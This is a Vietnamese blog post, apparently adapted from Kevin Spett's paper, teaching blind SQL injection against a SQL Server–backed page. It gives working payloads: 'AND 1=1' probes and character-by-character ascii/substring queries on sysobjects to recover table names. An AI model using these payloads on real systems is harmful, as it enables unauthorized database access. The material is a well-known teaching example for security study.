Khai thác lỗi Blind SQL nâng cao

Trước hết phải nói đây là bài cũ rùi, nhưng sau bài này mình sẽ có thêm 1 ví dụ cụ thể chăc sẽ dễ chịu hơn với những ai chưa rõ lắm ( chỉ sợ...

Trước hết phải nói đây là bài cũ rùi, nhưng sau bài này mình sẽ có thêm 1 ví dụ cụ thể chăc sẽ dễ chịu
hơn với những ai chưa rõ lắm ( chỉ sợ ai cũng rõ rồi thì phí công wé )
Bài lấy trong kho nhé :
Bài này là bài dịch đầu tay hay sao á
Dựa theo bài viết của : Kevin Spett

Nói qua 1 chút , nếu khai thác theo lỗi SQL injection thông thường ta khai thác qua các error message gửi về từ server .Tuy nhiên 1 số admin đã ngăn việc hiển thị các error message nhưng thật đáng tieec như thế là ko đủ
Nếu như bạn ko nhận được các error message thì đừng lo vì rất có thể chúng ta vẫn khai thác thông tin được qua "blind" sql injection .

Phát hiện lỗi "blind sql injection":

1 URL như sau : http://www.company.com/pressRelease.jsp?pressID=5

và câu lệnh SQL được thực hiện sẽ là :

SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5

để xác định xem nó có bị dinh lỗi blind sql injection ko ta hãy thử thêm vào 1 điều kiện đúng .Ví dụ như:

http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1

và nếu database server thực hiện lệnh

SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 AND 1=1

và nếu ta vẫn được trả về vị trí của http://www.company.com/pressRelease.jsp?pressID=5 thì có nghĩa là nó đã dính lỗi rồi đấy .

Khai thác:

Bây giờ chúng ta sẽ đoán các thông tin của database bằng việc thực hiên các câu hỏi đúng sai với server

Ví dụ : ta sẽ hỏi server xem " có phải user hiện tại là dbo ko?" bằng cách :

http://www.company.com/pressRelease.jsp?pressID=5 AND USER_NAME()='dbo'

( USER_NAME() là 1 hàm của SQL Server trả về tên của user hiện tại )

Nếu user hiện tai đúng là 'dbo' thì chúng ta sẽ được trả về http://www.company.com/pressRelease.jsp?pressID=5 còn nếu ko thì sẽ ko có trang nào được trả về cả.

Hay phải ko các bạn

Bằng cách so sanh các câu hỏi nhỏ với các hàm ta có thể hỏi nhiều câu phức tạp hơn . Sau đây là ví dụ về cách lấy tên của 1 table ( từng chữ 1 )

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>109

Lệnh SELECT sẽ yêu cầu tên của table đầu tiên trong database

Hàm substring() sẽ trả về chữ đầu tiên trong kết quả của câu lện

Hàm lower() đơn giản chỉ là chuyển kí tự thành kiêu chữ thường, ko viết hoa.

Hàm ascii() sẽ trả về giá trị ASCII của kí tự đó

Nếu server ko báo lỗi gì thì chúng ta có thể biết rằng tên đầu tiên của table là một chữ sau chữ "m" ( vì trong bảng mã giá trị của chữ "m" là 109 )

tiếp theo :

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>116

Nếu báo lỗi tức là ta biết được giá trị ASCII của kí tự đầu tiên này nằm trong khoảng từ chữ "n" đến chữ "t" ( giá trị của t là 116)

Cứ thế thu hẹp dần ta sẽ được giá trị của kí tự đầu tiên sẽ nằm trong khoảng "n" và "o" ( 110 và 111)

Tiếp theo:

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))=111

Server ko báo lỗi mà trở về trang http://www.company.com/pressRelease.jsp?pressID=5 <--vậy là ta biết được kí tự đầu tiên của table là "o"

Đoán tiếp kí tự thứ 2 ta làm như sau :

http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1)))>109

(chú ý ta phải đổi đối số từ 1 sang 2 )

và rồi làm lại như thế , dần dân ta sẽ nhân được tên đầy đủ của table ( trong ví dụ này là "orders")

Bài này ko phải là dịch hoàn toàn mà dựa trên sự đọc hiểu của mình và viết lại , nếu các bạn thấy chỗ nào thiếu chính xác thì góp ý nhá ( mong các bạn đừng cười )

À còn đây là 1 chút về bảng mã ASCII cho nhưng bạn nào chưa biết :

1. Bảng mã ASCII :

Bộ kí tự ASCII gồm 256 kí tự được phân bố như sau:

+ 32 kí tự đầu là các kí tự điều khiển ko in được ví dụ như kí tự ENTER ( mã 13) , ký tự ESC ( mã 27)

+ các mã 32-47,58-64,91-96 và 123-127 là các kí tữ đặc biệt như dấu chấm, chấm phẩy , dấu ngoặc , móc , hỏi .....

+ các mã 48-57 là 10 chữ số

+ các mã 65-90 là các chữ cái hoa A->Z

+ các kí tự 97-122 là các chữ cái thường a->z

+ các mã ASSCII là các kí tự đồ họa

Cụ thể hơn bạn có thể viết 1 CT nhỏ bằng pascal , C ...... để liệt kê bảng mã ASCII cho mình
Ads Here
Tên

1st,2,8051,3,AAG,1,ADS,2,ADSL,2,AIO,1,Alarm,1,Altcoin,1,AMD,2,Amplifier,4,Android,2,Android TV,3,AOE,1,APG,1,APK,3,ASIC,2,ATX,2,AVG,3,Ấp trứng,2,Bàn phím cơ,1,Bản quyền,1,baner,3,Bảng giá,5,Banggood,1,Báo giá,1,Báo hỏng,1,Bảo Mật,4,BCC,1,BCN,1,Binance,1,Bitcoin,5,Bitmex,1,Bittrex,1,BIX,1,blogger,2,BNB,1,bootrom,1,BTC,4,Build PC,1,ByteCoin,1,cable,1,Cài đặt,3,Cài Win,2,Camera,6,Camera giám sát,3,camera IP,2,Cáp quang,8,Cáp quang Cá nhân,2,Cáp quang Doanh nghiệp,1,Cấu hình máy,1,CCTV,1,Chống nước,1,Clicksense,2,Cloud,1,Cloud camera,2,Code,8,Code web,8,coin,5,Combo,1,Controller,1,Covid-19,9,Công nghệ mới,1,Cryptocurrency,26,Cung hoàng đạo,1,DAG,1,DDos,39,DEEP WEB,3,Dịch vụ FPT,4,DIY,8,Đại Từ,1,Đánh giá,5,Đào coin,6,Đâu là đúng,5,Địa chỉ,1,Điện thoại,2,Điều khiển giọng nói,1,Đồng hồ,1,Electronics,1,English,2,epon,1,ETC,1,ETH,6,Facebook,10,featured,1,Foxy,1,fpt,12,FPT camera,4,FPT internet,3,FPT Play,1,FPT Play Box,32,FPT Playbox,3,FPT Telecom,5,FPT Thái Nguyên,6,FPT TV,1,FPT TV 4K,1,FPT TVOnly,1,fshare,1,G-97D2,3,G97RG6M1,1,Game,2,Game gear,1,Game PC,2,getlink,1,Ghost,2,Ghost Windows 10,2,Ghost Windows 7,7,Gói cá nhân,2,Gói cước,2,Gói cước FPT,8,Gói Doanh Nghiệp,4,Gói kênh FPT Play,1,GPON,3,GPU,2,Hà Nội,1,Hacker,1,Hàn Quốc,1,HBO,1,HG531,2,Hi FPT,3,HiFPT,1,Học Online,1,Hot,15,houbi,3,HT,1,HTC,1,Hướng dẫn,10,Hướng dẫn FPT,8,IC555,4,ICO,3,Ifan,1,Infographic,2,internet,8,Inverter,1,IP tĩnh,1,IPTV,1,ISO,1,K+,1,KCS,1,Key,1,keypad,1,Kho Tut,59,Khuyến mại,10,kích sóng wifi,1,Kiếm tiền trên mạng,1,Kiến thức,2,Kinh nghiệm,1,Lan,1,Laptop,1,Lắp mạng,3,LED,6,leech link,1,Li-Ion,1,Light,1,LM386,1,Love,2,Lừa đảo,1,Ma kết,1,Mạch Audio,1,Mạch điện tử,1,Mạch sạc,5,Mainboard,1,Mạng chậm,1,Mạng internet,3,Mạng LAN,3,Máy ảnh,1,Máy tính,3,Meter,1,Miband,3,Microsoft,1,Minning,4,MMO,3,Mobile,3,Modem,17,Mở két,1,Music,1,Netflix,1,News,7,Ngoại ngữ,1,Nguồn,3,Nvidia,1,offer,1,Office,2,Onedrive,1,Online,1,OS,2,Others,1,Paypal,1,PC,1,PCB,1,PDF,1,Phấn Mễ,1,Phần mềm,2,Phim,1,Phòng nét,1,Photo,1,Phổ Yên,1,Phú Lương,1,Phụ nữ,1,PIC,2,Pin - Ắc qui,4,proxy,1,PUBG,1,Python,4,Remitano,3,Repeater,1,Review,4,Review FPT,2,Root,1,Router,2,Rút gọn link,1,sạc dụng phòng,1,Sạc điện thoại,1,Sàn giao dịch,2,Scam,3,Sensor,2,setup,2,smarthome,1,Softwares,5,sonoff,1,SQL,3,Super 22,2,Tài liệu,182,Tenda Nova MW3,1,Thái Nguyên,19,Thẻ visa,1,Thể thao,1,Thi công,1,Thơ thẩn,3,Thủ thuật,89,Tiền bạc,1,Tiền điện tử,3,Tin FPT,5,Tin tức,41,Tình yêu,4,Tivi box,1,Tivi Gold,1,TNUT,1,Tool,2,Tool đào coin,6,Tools,45,TP Link,1,TP-Link,3,trade coin,8,Trading,1,Transitsor,2,Trâu cày,2,Truyện,3,Truyền hình,4,Truyền hình FPT,29,Tuyển dụng,3,Tư vấn,4,TV Box,3,UG,15,USB,1,USDT,2,VGA,1,Video,1,Viettel,2,Viễn thông,1,Vinaphone,1,Virus,11,VPN,1,Web,1,wifi,17,Wifi Maketting,1,Window XP,3,Windows,4,Windows 10,6,Windows 10 Mobile,1,Windows 7,2,Xiaomi,4,XMR,2,Youtube,1,Zcash,1,Zec,1,
ltr
item
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box: Khai thác lỗi Blind SQL nâng cao
Khai thác lỗi Blind SQL nâng cao
Tổng đài lắp mạng FPT Thái Nguyên |Cáp quang | Wifi | Truyền hình 4K |FPT Play Box
https://www.xn--fptthinguyn-o7a6j.vn/2015/08/khai-thac-loi-blind-sql-nang-cao.html
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/
https://www.xn--fptthinguyn-o7a6j.vn/2015/08/khai-thac-loi-blind-sql-nang-cao.html
true
8240370674769512952
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy